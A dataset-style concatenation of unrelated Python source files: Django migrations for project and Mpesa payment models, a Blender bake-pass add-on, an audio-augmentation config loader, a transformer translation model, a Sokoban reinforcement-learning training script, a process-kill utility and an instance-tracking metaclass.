content stringlengths 5 1.05M |
|---|
# Generated by Django 3.0.7 on 2020-09-18 18:07
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0011_project_link'),
]
operations = [
migrations.RemoveField(
model_name='project',
name='link',
),
]
|
import bpy
from . import bake_manager
from . import string_manager
from enum import Enum
from bpy.props import (
IntProperty,
BoolProperty,
BoolVectorProperty,
EnumProperty,
FloatProperty,
FloatVectorProperty,
StringProperty,
PointerProperty
)
class BakeType(Enum):
TRANSMISSION = 0,
GLOSSY = 1,
DIFFUSE = 2,
ENVIRONMENT = 3,
EMIT = 4,
ROUGHNESS = 5,
UV = 6,
NORMAL = 7,
SHADOW = 8,
AO = 9,
COMBINED = 10,
METALLIC = 11,
BASE_COLOR = 12,
DISPLACEMENT = 13,
ALPHA = 14,
CHANNEL_TRANSFER = 15,
AOV = 16,
POINTINESS = 17
def get_bake_type_string(bake_type, no_underscore = False):
'''
Returns the bake type as string ("BASE_COLOR" etc)
Since I'm using custom attributes on the fly it seems
that it's not possible(?) to get the the enum string value.
I just get the basic value (integer) when I use bake_pass['bake_type']
'''
# TODO: Check if this function is still used
# OBS!
bake_types_list = [
"TRANSMISSION",
"GLOSSY",
"DIFFUSE",
"ENVIRONMENT",
"EMIT",
"ROUGHNESS",
"UV",
"NORMAL",
"SHADOW",
"AO",
"COMBINED",
"METALLIC",
"BASE_COLOR",
"DISPLACEMENT",
"ALPHA",
"CHANNEL_TRANSFER",
"AOV",
"POINTINESS"
]
bake_type = bake_types_list[bake_type].replace("_", " ", 1000)
return bake_type
def on_bake_type_update(self, context):
from . import string_manager as sm
# Get bake_pass from id data from self
scene_string = repr(self.id_data)
bake_pass_string = repr(self.path_from_id())
bake_pass_string = bake_pass_string.replace("'", "")
bake_pass = eval(scene_string + "." + bake_pass_string)
bake_type = bake_pass.bake_type
# Set old type if the custom attribute is missing
old_type = bake_pass.get('old_type')
if not old_type:
bake_pass['old_type'] = bake_type
old_type = ""
# Rename if name is empty
if bake_pass.name == "":
print("renamed because name was empty")
bake_pass.name = bake_type
bake_pass['old_type'] = bake_type
return
print("\n old_type = " + old_type)
old_name = ""
new_name = ""
print(bake_pass.name +".find(" + sm.to_camelcase(old_type) + ") = " + str(bake_pass.name.find(sm.to_camelcase(old_type))))
if old_type == "":
bake_pass.name = bake_type
bake_pass['old_type'] = bake_type
return
# Camelcase
if bake_pass.name.find(sm.to_camelcase(old_type)) > -1:
print(old_type + " is camelcase")
old_name = sm.to_camelcase(old_type)
new_name = sm.to_camelcase(bake_type)
# Underscore
elif bake_pass.name.find(sm.to_underscore(old_type)) > -1:
print(old_type + " is underscore")
old_name = sm.to_underscore(old_type)
new_name = sm.to_underscore(bake_type)
# Uppercase
elif bake_pass.name.find(old_type.upper()) > -1:
print(old_type + " is uppercase")
old_name = old_type.upper()
new_name = bake_type.upper()
print("working with " + bake_pass.name + ". Replaceing " + old_name + " with " + new_name)
bake_pass.name = bake_pass.name.replace(old_name, new_name)
bake_pass['old_type'] = bake_type
class BakePass(bpy.types.PropertyGroup):
auto_description = "Trust Bystedts preferred settings depending on the bake type"
global_description = "Use the setting in the global settings in the top of the UI"
temporary_description = "Use a temporary scene. This usually saves time, since less objects needs to be loaded. Lights will not be transferred to the temporary scene"
#("GLOBAL_SETTINGS", "Global settings", global_description, 0),
value_keyword_items = [
("AUTO", "Auto", auto_description, 0),
("SET", "Set", "", 1)
]
name: bpy.props.StringProperty(name="Name", default="Unknown")
ui_display: bpy.props.BoolProperty(name="UI display", default = False, description = "Show or hide in UI")
# Don't forget to possibly add new passes to is_non_defualt_bake_pass
bake_type_items = [
("TRANSMISSION", "Transmission", "", 0),
("GLOSSY", "Glossy", "", 1),
("DIFFUSE", "Diffuse", "", 2),
("ENVIRONMENT", "Environment", "", 3),
("EMIT", "Emit", "", 4),
("ROUGHNESS", "Roughness", "", 5),
("UV", "Uv", "", 6),
("NORMAL", "Normal", "", 7),
("SHADOW", "Shadow", "", 8),
("AO", "Ambient occlusion", "", 9),
("COMBINED", "Combined", "", 10),
("METALLIC", "Metallic", "", 11),
("BASE COLOR", "Base Color", "", 12),
("DISPLACEMENT", "Displacement", "", 13),
("ALPHA", "Alpha", "", 14),
("CHANNEL_TRANSFER", "Channel transfer", "", 15),
("AOV", "AOV", "", 16),
("POINTINESS", "Pointiness", "", 17),
("MATERIAL_ID", "Material ID", "", 18),
]
bake_type: bpy.props.EnumProperty(
name="Bake type",
description = "Bake type",
items = bake_type_items,
default = "BASE COLOR",
update = on_bake_type_update)
sample_type: bpy.props.EnumProperty(
name="Sample type",
description = "Samples type",
default = "AUTO",
items = value_keyword_items)
# I removed AUTO from bake space
bake_locations_items = [
("AUTO", "Auto", "", 0),
("CURRENT_LOCATION", "Current location", "Use objects Current location during baking. Can result in wrong surface being hit", 1),
("EXPLODED", "Exploded", "Place objects far from each other during baking. Will avoid wrong surface being hit.", 2)
]
bake_locations: bpy.props.EnumProperty(
name="Bake space",
description = "Bake space",
items = bake_locations_items)
sub_pixel_sample_items = [
("AUTO", "Auto", auto_description, 0),
("1", "X 1", "", 1),
("2", "X 2", "", 2),
("4", "X 4", "", 3),
]
# Note to self: I used to set sub pixel sample per bake pass
# changed my mind and used an over all setting instead
sub_pixel_sample: bpy.props.EnumProperty(name="Sub pixel sample", description = "Higher sub pixel sample improves anti aliasing", items = sub_pixel_sample_items)
bake_scene_items = [
("AUTO", "Auto", auto_description, 0),
("CURRENT", "Current scene", "Use current scene for baking", 1),
("TEMPORARY", "Temporary scene", temporary_description, 2),
]
bake_scene: bpy.props.EnumProperty(
name="Bake scene",
description = "Which scene to bake in",
default = "AUTO",
items = bake_scene_items)
samples: bpy.props.IntProperty(
name="Samples",
description = "Amount of samples during baking",
default=1,
min = 0,
soft_max = 256)
# Normal ========================
normal_space_items = [
("OBJECT", "Object", "", 0),
("TANGENT", "Tangent", "", 1)
]
normal_space: bpy.props.EnumProperty(
name="Space",
description = "Choose normal space for baking",
items = normal_space_items,
default="TANGENT")
normal_map_type_items = [
("OPEN_GL", "Open GL", "", 0),
("DIRECT_X", "Direct X", "", 1)
]
normal_map_type: bpy.props.EnumProperty(
name="Normal map type",
description = "Type of normal map",
items = normal_map_type_items,
default="OPEN_GL")
normal_map_swizzle_items = [
("POS_X", "+ X", "", 0),
("POS_Y", "+ Y", "", 1),
("POS_Z", "+ Z", "", 2),
("NEG_X", "+ X", "", 3),
("NEG_Y", "+ Y", "", 4),
("NEG_Z", "+ Z", "", 5)
]
normal_r: bpy.props.EnumProperty(
name="Swizzle R",
description = "Type of normal map",
items = normal_map_swizzle_items,
default="POS_X")
normal_g: bpy.props.EnumProperty(
name="Swizzle G",
description = "Type of normal map",
items = normal_map_swizzle_items,
default="POS_Y")
normal_b: bpy.props.EnumProperty(
name="Swizzle B",
description = "Type of normal map",
items = normal_map_swizzle_items,
default="POS_Z")
# Post process ========================
post_process_items = [
("NO_POST_PROCESS", "No post process", "Don't perform post process", 0),
("AUTO", "Auto", "Trust Bystedts preferred settings", 1),
("DENOISE", "Denoise", "Use denoise", 2)
]
post_process: bpy.props.EnumProperty(
name="Post process",
description = "Which post process to perform on image after baking",
default = "AUTO",
items = post_process_items)
image_name_override: bpy.props.BoolProperty(
name="Image name override",
description = "Always use the bake pass name when naming images and files",
)
# Channel transfer
#-----
R_source: bpy.props.StringProperty(
name="R source",
description = "Which image to transfer red channel from",
)
G_source: bpy.props.StringProperty(
name="G source",
description = "Which image to transfer green channel from",
)
B_source: bpy.props.StringProperty(
name="B source",
description = "Which image to transfer blue channel from",
)
A_source: bpy.props.StringProperty(
name="Alpha source",
description = "Which image to transfer alpha channel from",
)
#-----
channel_items = [
("R", "R", "Red channel", 0),
("G", "G", "Green channel", 1),
("B", "B", "Blue channel", 2),
("A", "A", "Alpha channel", 3),
("NONE", "None", "Don't transfer the channel", 4),
]
transfer_source_channelR: bpy.props.EnumProperty(
name="Target channel red",
description = "Channel to transfer red to",
default = "R",
items = channel_items
)
transfer_source_channelG: bpy.props.EnumProperty(
name="Target channel green",
description = "Channel to transfer green to",
default = "G",
items = channel_items
)
transfer_source_channelB: bpy.props.EnumProperty(
name="Target channel blue",
description = "Channel to transfer blue to",
default = "B",
items = channel_items
)
transfer_source_channelA: bpy.props.EnumProperty(
name="Target channel alpha",
description = "Channel to transfer alpha to",
default = "A",
items = channel_items
)
# AOV
aov_name: bpy.props.StringProperty(
name="AOV name",
description = "Name of the AOV in the shading network to bake",
default = "",
)
aov_data_type_items = [
("COLOR", "Color", "Bake aov color value", 0),
("VALUE ", "Value", "Bake aov color value", 1),
]
aov_data_type: bpy.props.EnumProperty(
name="AOV data type",
description = "Bake AOV color or value",
default = "COLOR",
items = aov_data_type_items
)
# Pointiness
pointiness_contrast: bpy.props.FloatProperty(
name="Pointiness contrast",
description = "Amount of contrast to use on the pointiness",
default = 20,
)
preview_bake_texture: bpy.props.BoolProperty(
name = "Preview bake texture",
default = 0)
def is_non_default_bake_pass(bake_pass_type):
bake_pass_type = bake_pass_type.upper()
list = [
'METALLIC',
'BASE COLOR',
'DISPLACEMENT',
'ALPHA',
'AOV',
'POINTINESS',
'MATERIAL_ID',
]
return bake_pass_type in list
def is_low_sample_pass(bake_pass):
bake_pass_type = bake_pass.bake_type.upper()
list = [
'GLOSSY', 'DIFFUSE', 'EMIT', 'ROUGHNESS', 'UV', 'NORMAL',
'METALLIC', 'BASE COLOR', 'DISPLACEMENT', 'ALPHA',
'AOV', 'POINTINESS', 'MATERIAL_ID'
]
return bake_pass_type in list
def is_temporary_scene_bake_pass(bake_pass):
bake_pass_type = bake_pass.bake_type.upper()
list = [
'GLOSSY', 'DIFFUSE', 'EMIT', 'ROUGHNESS', 'UV', 'NORMAL',
'METALLIC', 'BASE COLOR', 'DISPLACEMENT', 'AO', 'SHADOW',
'ALPHA', 'AOV', "POINTINESS", 'MATERIAL_ID'
]
return bake_pass_type in list
def add_bakepass(context, BakeType):
new_bake_pass = context.scene.bake_passes.add()
new_bake_pass.name = "Base Color"
class RENDER_OT_delete_bake_pass(bpy.types.Operator):
"""Delete bake pass"""
bl_idname = "render.delete_bake_pass"
bl_label = "Delete bake pass"
bl_description = "Delete bake pass"
bake_pass_index: IntProperty(
name="Index to delete",
description="Index of the bake pass to delete",
min=0,
)
def execute(self, context):
context.scene.bake_passes.remove(self.bake_pass_index)
return {'FINISHED'}
class RENDER_OT_toggle_bake_pass_ui_display(bpy.types.Operator):
"""Toggle bakepass ui display"""
bl_idname = "render.toggle_bake_pass_ui_display"
bl_label = "Expand/collapse"
bl_description = "Toggle bakepass ui display"
bake_pass_index: IntProperty(
name="Index to toggle ui display",
description="Index of the bake pass to toggle ui display",
min=0,
)
def execute(self, context):
if context.scene.bake_passes[self.bake_pass_index].ui_display == True:
context.scene.bake_passes[self.bake_pass_index].ui_display = False
else:
context.scene.bake_passes[self.bake_pass_index].ui_display = True
return {'FINISHED'}
def get_base_color(bake_type, alpha = 0.0):
if bake_type == "NORMAL" or bake_type == "UV":
base_color = [0.5, 0.5, 1.0, alpha]
elif bake_type == "AO":
base_color = [1.0, 1.0, 1.0, alpha]
elif bake_type == "EMIT" or bake_type == "AOV":
base_color = [0, 0, 0, alpha]
elif bake_type == "ALPHA":
base_color = [0, 0, 0, alpha]
else:
base_color = [0.5, 0.5, 0.5, alpha]
return base_color
def get_pass_from_string(bake_pass_string):
index_start = bake_pass_string.rindex("_") + 1
pass_name = bake_pass_string[index_start : len(bake_pass_string)]
for bake_type in BakeType:
if pass_name == str(bake_type.name):
return bake_type
def get_sorted_bake_passes_list(context):
'''
Return a list with all bakepasses in scene where
they are sorted after which order they should be
processed. Bake passes of type "channel_transfer"
should be processed last for example
'''
prio_1_list = []
prio_2_list = []
for bake_pass in context.scene.bake_passes:
if bake_pass.bake_type == 'CHANNEL_TRANSFER':
prio_2_list.append(bake_pass)
else:
prio_1_list.append(bake_pass)
sorted_bake_pass_list = prio_1_list + prio_2_list
return sorted_bake_pass_list
classes = (
BakePass,
RENDER_OT_delete_bake_pass,
RENDER_OT_toggle_bake_pass_ui_display,
)
def register():
for clas in classes:
bpy.utils.register_class(clas)
bpy.types.Scene.bake_passes = bpy.props.CollectionProperty(type=BakePass)
def unregister():
for clas in classes:
bpy.utils.unregister_class(clas)
del bpy.types.Scene.bake_passes |
from pathlib import Path
from typing import Any, Dict, Text, Optional, Union
from importlib import import_module
import torch_audiomentations
from torch_audiomentations import Compose
from torch_audiomentations.core.transforms_interface import BaseWaveformTransform
# TODO: define this elsewhere?
# TODO: update when a new type of transform is added (e.g. BaseSpectrogramTransform? OneOf? SomeOf?)
# https://github.com/asteroid-team/torch-audiomentations/issues/26
Transform = Union[BaseWaveformTransform, Compose]
def get_class_by_name(
class_name: str, default_module_name: str = "torch_audiomentations"
) -> type:
"""Load class by its name
Parameters
----------
class_name : `str`
default_module_name : `str`, optional
When provided and `class_name` does not contain the absolute path.
Defaults to "torch_audiomentations".
Returns
-------
Klass : `type`
Class.
Example
-------
>>> YourAugmentation = get_class_by_name('your_package.your_module.YourAugmentation')
>>> YourAugmentation = get_class_by_name('YourAugmentation', default_module_name='your_package.your_module')
>>> from torch_audiomentations import Gain
>>> assert Gain == get_class_by_name('Gain')
"""
tokens = class_name.split(".")
if len(tokens) == 1:
if default_module_name is None:
msg = (
f'Could not infer module name from class name "{class_name}".'
f"Please provide default module name."
)
raise ValueError(msg)
module_name = default_module_name
else:
module_name = ".".join(tokens[:-1])
class_name = tokens[-1]
return getattr(import_module(module_name), class_name)
def from_dict(config: Dict[Text, Union[Text, Dict[Text, Any]]]) -> Transform:
"""Instantiate a transform from a configuration dictionary.
`from_dict` can be used to instantiate a transform from its class name.
For instance, these two pieces of code are equivalent:
>>> from torch_audiomentations import Gain
>>> transform = Gain(min_gain_in_db=-12.0)
>>> transform = from_dict({'transform': 'Gain',
... 'params': {'min_gain_in_db': -12.0}})
Transforms composition is also supported:
>>> compose = from_dict(
... {'transform': 'Compose',
... 'params': {'transforms': [{'transform': 'Gain',
... 'params': {'min_gain_in_db': -12.0,
... 'mode': 'per_channel'}},
... {'transform': 'PolarityInversion'}],
... 'shuffle': True}})
:param config: configuration - a configuration dictionary
:returns: A transform.
:rtype Transform:
"""
try:
TransformClassName: Text = config["transform"]
except KeyError:
raise ValueError(
"A (currently missing) 'transform' key should be used to define the transform type."
)
try:
TransformClass = get_class_by_name(TransformClassName)
except AttributeError:
raise ValueError(
f"torch_audiomentations does not implement {TransformClassName} transform."
)
transform_params: Dict = config.get("params", dict())
if not isinstance(transform_params, dict):
raise ValueError(
"Transform parameters must be provided as {'param_name': param_value} dictionary."
)
if TransformClassName in ["Compose", "OneOf", "SomeOf"]:
transform_params["transforms"] = [
from_dict(sub_transform_config)
for sub_transform_config in transform_params["transforms"]
]
return TransformClass(**transform_params)
def from_yaml(file_yml: Union[Path, Text]) -> Transform:
"""Instantiate a transform from a YAML configuration file.
`from_yaml` can be used to instantiate a transform from a YAML file.
For instance, these two pieces of code are equivalent:
>>> from torch_audiomentations import Gain
>>> transform = Gain(min_gain_in_db=-12.0, mode="per_channel")
>>> transform = from_yaml("config.yml")
where the content of `config.yml` is something like:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# config.yml
transform: Gain
params:
min_gain_in_db: -12.0
mode: per_channel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Transforms composition is also supported:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# config.yml
transform: Compose
params:
shuffle: True
transforms:
- transform: Gain
params:
min_gain_in_db: -12.0
mode: per_channel
- transform: PolarityInversion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:param file_yml: configuration file - a path to a YAML file with the following structure:
:returns: A transform.
:rtype Transform:
"""
try:
import yaml
except ImportError as e:
raise ImportError(
"PyYAML package is needed by `from_yaml`: please install it first."
)
with open(file_yml, "r") as f:
config = yaml.load(f, Loader=yaml.SafeLoader)
return from_dict(config)
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
=============
Cadc TAP plus
=============
"""
|
#!/usr/bin/python
import subprocess
import time
import os
import signal
PID = 10128
def check_pid(pid):
""" Check For the existence of a unix pid. """
try:
os.kill(pid, 0)
except OSError as ex:
template = "An exception of type {0} occured.\nArguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print (message)
return False
else:
return True
##NOW Kill the existing Running Server
os.kill(int(PID), signal.SIGTERM)
if check_pid(PID) is True :
print ('Process is Still Running')
else:
print ('No Process With pid %s '% (PID)) |
# Generated by Django 3.2.9 on 2021-11-15 09:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="MpesaCallbacks",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("updated_at", models.DateTimeField(auto_now=True)),
("ip_address", models.TextField()),
("caller", models.TextField()),
("conversation_id", models.TextField()),
("content", models.TextField()),
],
options={
"verbose_name": "Mpesa Callback",
"verbose_name_plural": "Mpesa Callbacks",
"db_table": "mpesa_callbacks",
},
),
migrations.CreateModel(
name="MpesaCalls",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("updated_at", models.DateTimeField(auto_now=True)),
("ip_address", models.TextField()),
("caller", models.TextField()),
("conversation_id", models.TextField()),
("content", models.TextField()),
],
options={
"verbose_name": "Mpesa Call",
"verbose_name_plural": "Mpesa Calls",
"db_table": "mpesa_calls",
},
),
migrations.CreateModel(
name="MpesaPayments",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("updated_at", models.DateTimeField(auto_now=True)),
("amount", models.DecimalField(decimal_places=2, max_digits=10)),
("description", models.TextField()),
("type", models.TextField()),
("reference", models.TextField()),
("first_name", models.CharField(max_length=100)),
("middle_name", models.CharField(max_length=100)),
("last_name", models.CharField(max_length=100)),
("phone_number", models.TextField()),
(
"organization_balance",
models.DecimalField(decimal_places=2, max_digits=10),
),
],
options={
"verbose_name": "Mpesa Payment",
"verbose_name_plural": "Mpesa Payments",
},
),
]
|
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import framework.configbase
from framework.ops import l2norm
from modules.transformer_encoder import Encoder, VISEncoder, CrossEncoder
from modules.common import gelu
class TransformerConfig(framework.configbase.ModuleConfig):
def __init__(self):
super(TransformerConfig, self).__init__()
self.vocab = 0
self.attr_num = 2010
self.img_max = 10
self.src_max = 36
self.tgt_max = 72
self.d_model = 512
self.n_layers = 3
self.vis_layers = 1
self.txt_layers = 1
self.heads = 8
self.dropout = 0.1
self.encoder_sharing = False
self.decoding = 'greedy'
class Transformer(nn.Module):
def __init__(self, config):
super(Transformer, self).__init__()
self.config = config
self.vis_encoder = VISEncoder(self.config.d_model, self.config.vis_layers, self.config.heads, self.config.dropout)
self.src_encoder = Encoder(self.config.vocab, self.config.d_model, self.config.txt_layers, self.config.heads, self.config.dropout)
self.src_encoder.pe.mode = self.vis_encoder.pe.mode
if self.config.encoder_sharing:
self.trg_encoder = self.src_encoder
else:
self.trg_encoder = Encoder(self.config.vocab, self.config.d_model, self.config.txt_layers, self.config.heads, self.config.dropout)
self.trg_encoder.pe.mode = self.src_encoder.pe.mode
self.cross_encoder = CrossEncoder(self.config.d_model, self.config.n_layers, self.config.heads, self.config.dropout)
# output layers
self.logit = nn.Linear(self.config.d_model, self.config.vocab)
self.logit.weight = self.src_encoder.embed.embed.weight
self.cls = nn.Linear(self.config.d_model, 2)
self.attr_cls = nn.Linear(self.config.d_model, self.config.attr_num)
self.dropout = nn.Dropout(self.config.dropout)
self.init_weights()
def init_weights(self,):
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
def forward(self, src, trg, img, src_mask, trg_mask, img_mask, task='mmt'):
s_outputs = self.src_encoder(src, src_mask, mode=0)
t_outputs = self.trg_encoder(trg, trg_mask, mode=1)
i_outputs = self.vis_encoder(img, img_mask, mode=2)
input = torch.cat([i_outputs, s_outputs, t_outputs], dim=1)
if trg_mask is not None and trg_mask.size(1) != 1:
firmask = torch.cat([img_mask, src_mask, trg_mask[:,0].unsqueeze(1)], dim=-1)
firmask = firmask.repeat(1, img.size(1)+src.size(1), 1)
img_mask = img_mask.repeat(1, trg.size(1), 1)
src_mask = src_mask.repeat(1, trg.size(1), 1)
secmask = torch.cat([img_mask, src_mask, trg_mask], dim=-1)
mask = torch.cat([firmask, secmask], dim=1)
else:
mask = torch.cat([img_mask, src_mask, trg_mask], dim=-1)
e_outputs = self.cross_encoder(input, mask)
if task == 'itm':
output = self.cls(gelu(e_outputs[:,-1]))
elif task == 'attp':
output = self.attr_cls(gelu(e_outputs[:,-1]))
else:
output = self.logit(e_outputs)
return output
def sample(self, src, img, src_mask, img_mask, decoding='greedy'):
init_tok, mask_tok = 2, 4
bs = src.size(0)
i_outputs = self.vis_encoder(img, img_mask, mode=2)
s_outputs = self.src_encoder(src, src_mask, mode=0)
init_word = torch.ones(bs, 1).fill_(init_tok).long().cuda()
trg_mask = self.nopeak_mask(1).repeat(bs, 1, 1)
t_outputs = self.trg_encoder(init_word, trg_mask, mode=1)
input = torch.cat([i_outputs, s_outputs, t_outputs], dim=1)
mask = torch.cat([img_mask, src_mask, trg_mask], dim=-1)
e_outputs = self.cross_encoder(input, mask, step=1)
mask_word = torch.ones(bs, 1).fill_(mask_tok).long().cuda()
outputs = torch.cat([init_word, mask_word], dim=1)
for i in range(2, self.config.tgt_max):
trg_mask = self.nopeak_mask(i).repeat(bs, 1, 1)
t_outputs = self.trg_encoder(outputs, trg_mask, mode=1)
out = self.logit(self.cross_encoder(t_outputs, trg_mask, step=i))
logprobs = F.log_softmax(out[:,-1], dim=-1)
if decoding == 'greedy':
_, next_word = torch.max(logprobs, dim=1)
next_word = next_word.unsqueeze(-1)
else:
probs = torch.exp(logprobs.data).cpu()
next_word = torch.multinomial(probs, 1).cuda()
outputs[:,-1] = next_word[:,0]
outputs = torch.cat([outputs, mask_word], dim=1)
return outputs
def nopeak_mask(self, size):
np_mask = np.triu(np.ones((1, size, size)), k=1).astype('uint8')
np_mask = Variable(torch.from_numpy(np_mask) == 0).cuda()
return np_mask
def init_vars(self, src, img, src_mask, img_mask, beam_size):
init_tok, mask_tok = 2, 4
bs = src.size(0)
i_outputs = self.vis_encoder(img, img_mask, mode=2)
s_outputs = self.src_encoder(src, src_mask, mode=0)
outputs = torch.LongTensor([[init_tok]] * bs).cuda()
trg_mask = self.nopeak_mask(1).repeat(bs, 1, 1)
t_outputs = self.trg_encoder(outputs, trg_mask, mode=1)
input = torch.cat([i_outputs, s_outputs, t_outputs], dim=1)
mask = torch.cat([img_mask, src_mask, trg_mask], dim=-1)
e_outputs = self.cross_encoder(input, mask, step=1)
mask_word = torch.ones(bs, 1).fill_(mask_tok).long().cuda()
outputs = torch.cat([outputs, mask_word], dim=1)
trg_mask = self.nopeak_mask(2).repeat(bs, 1, 1)
t_outputs = self.trg_encoder(outputs, trg_mask, mode=1)
out = self.logit(self.cross_encoder(t_outputs, trg_mask, step=2))
out = F.softmax(out, dim=-1)
probs, ix = out[:, -1].data.topk(beam_size)
log_scores = torch.log(probs)
outputs = torch.zeros(bs, beam_size, self.config.tgt_max).long().cuda()
outputs[:, :, 0] = init_tok
outputs[:, :, 1] = ix
return outputs, log_scores
def k_best_outputs(self, outputs, out, log_scores, i, k):
probs, ix = out[:, -1].data.topk(k)
log_probs = torch.Tensor([math.log(p) for p in probs.data.view(-1)]).view(k, -1).cuda() + log_scores.transpose(0,1)
k_probs, k_ix = log_probs.view(-1).topk(k)
# row = k_ix // k
row = torch.div(k_ix, k, rounding_mode='floor')
col = k_ix % k
outputs[:, :i] = outputs[row, :i]
outputs[:, i] = ix[row, col]
log_scores = k_probs
return outputs, log_scores
def beam_search(self, src, img, src_mask, img_mask, beam_size=5):
outputs, log_scores = self.init_vars(src, img, src_mask, img_mask, beam_size)
src_mask = src_mask.unsqueeze(1).expand(src_mask.size(0), beam_size, src_mask.size(-2), src_mask.size(-1))
src_mask = src_mask.contiguous().view(-1, src_mask.size(-2), src_mask.size(-1))
eos_tok, mask_tok = 3, 4
bs = src.size(0)
final = torch.zeros(bs, self.config.tgt_max).long().cuda()
mask_word = torch.ones(1, 1).fill_(mask_tok).long().cuda()
for i in range(2, self.config.tgt_max):
tmp = outputs.view(-1, outputs.size(-1))[:, :i]
tmp = torch.cat([tmp, mask_word.repeat(tmp.size(0), 1)], dim=1)
trg_mask = self.nopeak_mask(i+1).repeat(tmp.size(0), 1, 1)
t_outputs = self.trg_encoder(tmp, trg_mask, mode=1)
out = self.logit(self.cross_encoder(t_outputs, trg_mask, step=i+1))
out = F.softmax(out, dim=-1)
out = out.view(bs, beam_size, -1, out.size(-1))
for b in range(bs):
outputs[b], log_scores[b] = self.k_best_outputs(outputs[b], out[b], log_scores[b].unsqueeze(0), i, beam_size)
ones = (outputs[b]==eos_tok).nonzero() # Occurrences of end symbols for all input sentences.
sentence_lengths = torch.zeros(len(outputs[b]), dtype=torch.long).cuda()
for vec in ones:
if sentence_lengths[vec[0]]==0: # First end symbol has not been found yet
sentence_lengths[vec[0]] = vec[1] # Position of first end symbol
num_finished_sentences = len([s for s in sentence_lengths if s > 0])
if num_finished_sentences == beam_size:
alpha = 0.7
div = 1/(sentence_lengths.type_as(log_scores[b])**alpha)
_, ind = torch.max(log_scores[b] * div, 0)
if final[b].sum() == 0:
final[b] = outputs[b][ind]
for b in range(bs):
if final[b].sum() == 0:
final[b] = outputs[b][0]
return final
|
import gym
import gym_sokoban
from common.fix_and_reinit import fix_and_reinit
from common.train_the_agent import train_the_agent
from common.ActorCritic import ActorCritic
from common.RolloutStorage import RolloutStorage
from common.multiprocessing_env import SubprocVecEnv
import torch
import torch.autograd as autograd
import torch.optim as optim
import argparse
import wandb
def train(args, wandb_session):
if args.task == 's1t1fc_game2':
fix = 'conv'
source_env_name = 'Curriculum-Sokoban-v2'
taget_env_name = 'Curriculum-Sokoban-v4'
else:
fix = args.task[5]
source_env_name = 'Curriculum-Sokoban-v2'
target_env_name = 'Curriculum-Sokoban-v2'
source_task = args.task[1]
target_task = args.task[3]
if source_task == target_task:
target_task = str(target_task) + '_2'
source_task_map = args.map_file + str(source_task)
target_task_map = args.map_file + str(target_task)
#source task training
def make_env():
def _thunk():
env = gym.make(source_env_name, data_path = source_task_map)
return env
return _thunk
envs = [make_env() for i in range(args.num_envs)]
envs = SubprocVecEnv(envs)
state_shape = (3, 80, 80)
num_actions = 5
actor_critic = ActorCritic(state_shape, num_actions=num_actions)
rollout = RolloutStorage(args.rolloutStorage_size, args.num_envs, state_shape)
optimizer = optim.RMSprop(actor_critic.parameters(), lr=args.lr, eps=args.eps, alpha=args.alpha)
if args.USE_CUDA:
if not torch.cuda.is_available():
raise ValueError('You wanna use cuda, but the machine you are on doesnt support')
elif torch.cuda.is_available():
Variable = lambda *args, **kwargs: autograd.Variable(*args, **kwargs).cuda()
actor_critic.cuda()
rollout.cuda()
else:
Variable = lambda *args, **kwargs: autograd.Variable(*args, **kwargs)
print('Pre-training the agent...')
train_the_agent(envs, args.num_envs, Variable, state_shape, actor_critic, optimizer, rollout, data_path=None, args=args, wandb_session=wandb_session) #train and save the model;
#target task training
def make_env():
def _thunk():
env = gym.make(target_env_name, data_path = target_task_map)
return env
return _thunk
envs = [make_env() for i in range(args.num_envs)]
envs = SubprocVecEnv(envs)
actor_critic, optimizer = fix_and_reinit(actor_critic, optimizer, fix)
print('Fine-tunning the agent...')
train_the_agent(envs, args.num_envs, Variable, state_shape, actor_critic, optimizer, rollout, data_path=target_task_map, args=args, wandb_session=wandb_session) #train and save the model;
if __name__ == "__main__":
description = 'TLCLS'
parser = argparse.ArgumentParser(description=description)
parser.add_argument('--num_steps', type=int, default=1000000)
parser.add_argument('--task', type=str, default='s1t1k1')
parser.add_argument('--runs', type=int, default=3)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--entropy_coef', type=float, default=0.1)
parser.add_argument('--value_loss_coef', type=float, default=0.5)
parser.add_argument('--max_grad_norm', type=float, default=0.5)
parser.add_argument('--rolloutStorage_size', type=int, default=5)
parser.add_argument('--num_envs', type=int, default=30)
parser.add_argument('--eval_freq', type=int, default=1000)
parser.add_argument('--eval_num', type=int, default=20)
parser.add_argument('--lr', type=float, default=7e-4)
parser.add_argument('--eps', type=float, default=1e-5)
parser.add_argument('--alpha', type=float, default=0.99)
parser.add_argument('--map_file', type=str, default='./maps/')
args = parser.parse_args()
args.USE_CUDA = True
for run in range(args.runs):
wandb_session = wandb.init(project='TLCLS', config=vars(args), name="run-%i"%(run), reinit=True, group=args.task, mode='disabled')
config = wandb.config
train(args, wandb_session)
wandb_session.finish()
|
from typing import Iterable
class CollectorType(type):
# it is a staticmethod
def __new__(
collectorType: type, new_cls_name: str, new_cls_bases: tuple, class_definition_dict: dict,
):
new_cls = super().__new__(collectorType, new_cls_name, new_cls_bases, class_definition_dict)
return new_cls # __init__()
# called before __new__ return automatically
def __init__(new_cls: type, new_cls_name: str, new_cls_bases: tuple, new_cls_dict: dict):
super().__init__(new_cls_name, new_cls_bases, new_cls_dict)
new_cls._objects = set()
original_init = new_cls.__init__
def new_init(self, *args, **kwargs):
original_init(self, *args, **kwargs)
new_cls._objects.add(self)
new_cls.__init__ = new_init
